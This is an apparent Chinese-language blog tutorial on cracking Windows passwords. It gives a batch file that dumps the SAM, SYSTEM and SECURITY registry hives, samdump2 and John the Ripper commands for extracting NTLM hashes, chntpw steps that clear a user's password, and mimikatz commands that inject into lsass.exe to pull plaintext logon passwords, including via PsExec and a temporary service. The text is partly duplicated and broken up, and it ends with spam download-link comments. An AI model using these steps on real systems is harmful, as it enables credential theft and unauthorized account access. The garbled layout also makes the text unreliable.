什么是SAM文件?
SAM(Security Account Manager)是Windows系統以HASH方式儲存用戶密碼的地方。
而被存儲HASH的格式NTLM,位置則是在C:\windows\system32\config\SAM。
使用Kali Linux & Windows 讀取SAM的步驟:Samdump2的方式
1. 由於Windows預設無法直接複製,刪除和移動SAM,Security 以及SYSTEM,因此,我寫了一個.Bat 文件來複製SAM文件。
2.Try.bat 文件程式碼如下:
@echo off
reg SAVE HKLM\SAM C:\SAM
reg SAVE HKLM\SYSTEM C:\SYSTEM
reg SAVE HKLM\SECURITY C:\SECURITY
exit
4.當3個File 複製完畢後,就可以把這3個File drag 到Kali Linux 的Desktop 裡面[我選擇儲存在Chapter2文件裡]。
5.之後用 samdump2 SYSTEM SAM > pikachu,txt 將SAM 文件轉換成txt 文件形式。
6.通過John the Ripper 工具,可以使用John --show 讓pikachu,txt 裡面的所有Hash全部呈現出來。
7.最後用OP crack 或者Online NTLM Cracker 來將hash 轉換會原來的文字就大功告成了。
原本電腦密碼為:Banana
SAM(Security Account Manager)是Windows系統以HASH方式儲存用戶密碼的地方。
而被存儲HASH的格式NTLM,位置則是在C:\windows\system32\config\SAM。
使用Kali Linux & Windows 讀取SAM的步驟:Samdump2的方式
1. 由於Windows預設無法直接複製,刪除和移動SAM,Security 以及SYSTEM,因此,我寫了一個.Bat 文件來複製SAM文件。
2.Try.bat 文件程式碼如下:
@echo off
reg SAVE HKLM\SAM C:\SAM
reg SAVE HKLM\SYSTEM C:\SYSTEM
reg SAVE HKLM\SECURITY C:\SECURITY
exit
4.當3個File 複製完畢後,就可以把這3個File drag 到Kali Linux 的Desktop 裡面[我選擇儲存在Chapter2文件裡]。
5.之後用 samdump2 SYSTEM SAM > pikachu,txt 將SAM 文件轉換成txt 文件形式。
6.通過John the Ripper 工具,可以使用John --show 讓pikachu,txt 裡面的所有Hash全部呈現出來。
7.最後用OP crack 或者Online NTLM Cracker 來將hash 轉換會原來的文字就大功告成了。
原本電腦密碼為:Banana
使用Kali Linux & Windows 讀取SAM的步驟: 重置系統密碼
1.Live Boot Kali Linux
2,進入C:Drive 複製3個File(SYSTEM ,SECURITY and SAM)
3.輸入chntpw -l SAM, 會顯示SAM裡面所有用戶的資料。
4.輸入chantpw -u "bluebear171" SAM 後,你可以更換/清空用戶電腦密碼。
5. 選擇1,清空密碼
6. q for Exit
1.Live Boot Kali Linux
2,進入C:Drive 複製3個File(SYSTEM ,SECURITY and SAM)
3.輸入chntpw -l SAM, 會顯示SAM裡面所有用戶的資料。
4.輸入chantpw -u "bluebear171" SAM 後,你可以更換/清空用戶電腦密碼。
5. 選擇1,清空密碼
6. q for Exit
附加神器:mimikatz 2.0 目前支持所有Windows系統(Windows10
can)
介紹:此工具能直接從Isass.exe直接獲取Windows處於Active狀態賬號的明文密碼。亦能配合Metasploit 使用。
下載地址:http://blog.gentilkiwi.com/mimikatz
步驟如下:
1. Open Mimikatz.exe (32/64bit) with Admin 權限
2. 提升權限 :privilege::debug
3. 注入dll : inject::process lsass.exe sekurlsa.dll
4. 提取密碼:sekurlsa::logonpasswords 介紹:此工具能直接從Isass.exe直接獲取Windows處於Active狀態賬號的明文密碼。亦能配合Metasploit 使用。
下載地址:http://blog.gentilkiwi.com/mimikatz
步驟如下:
1. Open Mimikatz.exe (32/64bit) with Admin 權限
2. 提升權限 :privilege::debug
3. 注入dll : inject::process lsass.exe sekurlsa.dll
密碼不到1秒鐘就顯示出來了
5. Module sekurlsa 參考表
6. 遠程終端的方式
Needed Files
a)mimikatz_trunktoolsPsExec.exe
Needed Files
a)mimikatz_trunktoolsPsExec.exe
b) mimikatz_trunkWin32mimikatz.exe
c) mimikatz_trunkWin32sekurlsa.dll
c) mimikatz_trunkWin32sekurlsa.dll
1. PsExec.exe
启动
。
2.
运行
cmd.exe
,或者直接运行
mimikatz.exe
psexec
-s
cmd.exe
3
启动
mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
4.
提升权
限
privilege::debug
5.//
注入
dll
,(可以有空格
)
inject::process
lsass.exe
"C:\mimikatz_trunk\Win32\sekurlsa.dll"
6.//
抓取密
码
@getLogonPasswords
7.
exit
*******************************************************
//
创建服务方
法
sc
create
getpassword binpath=
"cmd.exe /c
c:\xxx\mimikatz.exe < command.txt > password.txt"
sc
start getpassword
sc
delete
getpassword
风铃的天空: Crack Windows Password Part 2 : Sam File With Kali Linux >>>>> Download Now
ReplyDelete>>>>> Download Full
风铃的天空: Crack Windows Password Part 2 : Sam File With Kali Linux >>>>> Download LINK
>>>>> Download Now
风铃的天空: Crack Windows Password Part 2 : Sam File With Kali Linux >>>>> Download Full
>>>>> Download LINK 3a